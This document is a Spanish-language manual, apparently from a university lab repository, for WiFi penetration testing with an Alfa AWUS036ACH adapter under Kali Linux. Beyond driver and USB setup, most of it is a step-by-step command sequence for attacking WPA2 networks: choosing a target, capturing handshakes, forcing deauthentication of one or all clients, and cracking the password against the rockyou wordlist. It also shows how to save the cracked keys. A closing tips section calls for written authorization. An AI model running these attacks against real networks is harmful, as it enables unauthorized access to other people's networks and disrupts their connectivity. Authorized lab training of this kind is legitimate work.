Files
biblioteca_conocimiento_lab…/docs/manual_pentesting_alpha_awus036ach.md

8.4 KiB

MANUAL PENTESTING WiFi — Alpha AWUS036ACH

Chipset: RTL8812AU | Dual-band 2.4/5GHz
Entorno: Laboratorio universitario con Live Boot USB Kali Linux


PARTE 1: INSTALAR DRIVER EN WINDOWS

Paso 1: Descargar driver

Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/ Descarga el driver Windows (RTL8812AU).

Paso 2: Instalar

  1. Desconecta la antena
  2. Ejecuta el instalador como administrador
  3. Reinicia el PC
  4. Conecta la antena después de reiniciar

Paso 3: Verificar

Abre PowerShell y ejecuta:

Get-NetAdapter

Deberías ver la interfaz "Realtek 8812AU" con estado "Up".

En Windows solo puedes escanar redes con Acrylic WiFi Free.
Para pentesting REAL necesitas Kali Linux (Parte 2).


PARTE 2: CREAR USB BOOTABLE DE KALI LINUX (CON PERSISTENCIA)

Paso 1: Descargar Kali

Ve a https://www.kali.org/get-kali/
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)

Paso 2: Grabar ISO en USB con Rufus

Necesitas: USB de 16GB mínimo + Rufus

  1. Descarga Rufus desde https://rufus.ie/
  2. Inserta el USB
  3. Abre Rufus
  4. Device = tu USB
  5. Boot selection = selecciona el ISO de Kali
  6. Partition scheme = MBR
  7. Target system = BIOS o UEFI
  8. Persistent storage → mueve la barra a 8-12 GB
    ⚠️ ESTO ES LO QUE CREA LA PARTICIÓN PERSISTENTE
    Si no la mueves, TODO se pierde al apagar
  9. Haz clic en START
  10. Selecciona "Write in DD mode" cuando pregunte
  11. Espera a que termine (~10-15 min)

PARTE 3: ARRANCAR KALI DESDE USB

Paso 1: Configurar BIOS para arrancar desde USB

  1. Reinicia el PC
  2. Pulsa F2, F12 o DEL al encender (depende del PC)
  3. En BIOS ve a "Boot" o "Boot Order"
  4. Pon "USB-HDD" o "Removable Device" como primera opción
  5. Guarda y sal (F10 normalmente)

Paso 2: Arrancar Kali

  1. En el menú de GRUB selecciona "Live system (amd64)"
  2. Usuario: kali / Contraseña: kali

Paso 3: Conectar la antena Alpha

  1. Conecta la Alpha por USB DESPUÉS de arrancar Kali
  2. Abre terminal y verifica:
lsusb
# Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
iwconfig
# Debe aparecer: wlan0 o wlan1

Si NO aparece wlan0, instala el driver:

sudo apt update
sudo apt install -y realtek-rtl88xxau-dkms
sudo reboot

PARTE 4: ACTIVAR MODO MONITOR

El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting.

# 1. Matar procesos que interfieran
sudo airmon-ng check kill

# 2. Activar modo monitor
sudo airmon-ng start wlan0

# 3. Verificar que está en modo monitor
iwconfig wlan0mon
# Debe decir: "Mode: Monitor"

Si en vez de wlan0mon aparece wlan0 en modo monitor,
usa wlan0 en todos los comandos siguientes.

SALIR del modo monitor cuando termines:

sudo airmon-ng stop wlan0mon

PARTE 5: ESCANEAR REDES WiFi

Este es el paso más importante. Aquí ves TODAS las redes a tu alrededor.

sudo airodump-ng wlan0mon

Columnas de la tabla:

Columna Significado
BSSID MAC del punto de acceso (router)
PWR Potencia de señal (-30=excelente, -90=malo)
Beacons Paquetes beacon recibidos
#Data Paquetes de datos capturados
CH Canal (1-13 en 2.4GHz, 36-165 en 5GHz)
ENC Cifrado (WPA2, WPA3, OPN=abierto)
ESSID Nombre de la red WiFi

PARA PARAR: pulsa Ctrl+C

Consejos para elegir red objetivo:

  • PWR entre -30 y -60 = buena señal (lo ideal)
  • #Data alto = hay tráfico (clientes activos)
  • ENC = WPA2 (el más común, se puede crackear)
  • Evita OPN (abierto) y WPA3 (muy difícil)

PARTE 6: CAPTURAR HANDSHAKE DE UNA RED

Una vez elegida tu red objetivo (por ejemplo "CampusLab" canal 6, BSSID AA:BB:CC:DD:EE:FF):

Abre UNA NUEVA terminal (no cierres la de escaneo) y ejecuta:

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

REEMPLAZA:

  • 6 → el canal de tu red objetivo
  • AA:BB:CC:DD:EE:FF → el BSSID de tu red
  • captura → nombre del archivo de salida

Esto hace:

  1. Escucha SOLO esa red en su canal
  2. Guarda todo en archivos: captura-01.cap, captura-01.csv
  3. Espera a que aparezca un "WPA handshake"

El WPA handshake aparece arriba a la derecha:

WPA handshake: AA:BB:CC:DD:EE:FF

ESTO ES LO QUE NECESITAS para crackear la contraseña.

Si no aparece el handshake, necesitas un cliente conectándose → Parte 7.


PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)

Si el handshake no aparece solo, puedes FORZAR a un cliente a reconectarse. Le desconecta momentáneamente y al reconectarse se captura el handshake.

ABRE UNA TERCERA terminal y ejecuta:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon

REEMPLAZA:

  • 5 → número de paquetes de deauth (5-10 suele bastar)
  • AA:BB:CC:DD:EE:FF → BSSID del router (igual que antes)
  • XX:XX:XX:XX:XX:XX → MAC del cliente conectado

Para ver clientes conectados:

Mira la terminal de la Parte 6. Bajo la columna "STATION" verás las MAC de los clientes.

Si no sabes la MAC del cliente, puedes omitir -c:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Esto envía deauth a TODOS los clientes de esa red.

VERIFICA que aparezca "WPA handshake" en la terminal de la Parte 6 después del ataque.


PARTE 8: CRACKEAR LA CONTRASEÑA

Una vez tengas el WPA handshake capturado:

Paso 1: Descomprimir el diccionario

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Paso 2: Ejecutar aircrack-ng

aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap

Sustituye captura-01.cap por el nombre de tu archivo.

Esto prueba TODAS las contraseñas del diccionario contra el handshake capturado.
Velocidad: ~1000-5000 claves/segundo.

Si la contraseña está en el diccionario:

KEY FOUND! [ la_contraseña ]

Si no está en el diccionario:

  • Prueba con otro diccionario más grande
  • O usa fuerza bruta (mucho más lento):
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap

PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)

Si usas Kali Live, al reiniciar TODO se pierde a menos que tengas persistencia.

Opción A — Rufus Persistent Partition (ya lo hiciste en Parte 2)

Si activaste "Persistent storage" en Rufus, los archivos en /home/kali se guardan automáticamente entre reinicios.

Opción B — Montar la partición persistente manualmente

# Identificar la partición
lsblk
# Busca la partición más grande del USB (sdb3 normalmente)

# Montar
sudo mkdir -p /mnt/persistence
sudo mount /dev/sdb3 /mnt/persistence

# Copiar resultados
cp captura-01.cap /mnt/persistence/
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt

# Desmontar
sudo umount /mnt/persistence

Opción C — Segundo USB o red

# A tu propio USB
cp captura-01.cap /media/kali/MI_USB/

# O subir a un servidor
scp captura-01.cap user@ip_servidor:/ruta/

PARTE 10: GUARDAR LA CONTRASEÑA

echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
cat ~/wifi_cracked.txt

PARTE 11: RESUMEN DE COMANDOS RÁPIDOS

Paso Comando
Ver antena lsusb && iwconfig
Matar interferencias sudo airmon-ng check kill
Activar monitor sudo airmon-ng start wlan0
Escanear redes sudo airodump-ng wlan0mon
Capturar 1 red sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
Deauth 1 cliente sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
Crackear aircrack-ng -w rockyou.txt file.cap
Salir monitor sudo airmon-ng stop wlan0mon

PARTE 12: TIPS PARA EL LABORATORIO UNIVERSITARIO

  1. Empieza solo con escaneo pasivo (airodump-ng) — aprende a leer las redes antes de hacer nada activo
  2. Documenta qué redes hay, en qué canales, qué cifrado usan
  3. Solo testea redes que tengas autorización explícita — pide al profesor/encargado por escrito
  4. Practica primero con tu propio router si puedes
  5. El rockyou.txt viene en Kali en /usr/share/wordlists/ (descomprimir con sudo gunzip)
  6. No hagas deauth en redes públicas reales — es ilegal sin autorización
  7. Si la señal es mala (PWR < -70), acércate al router o usa la antena con el reflector parabólico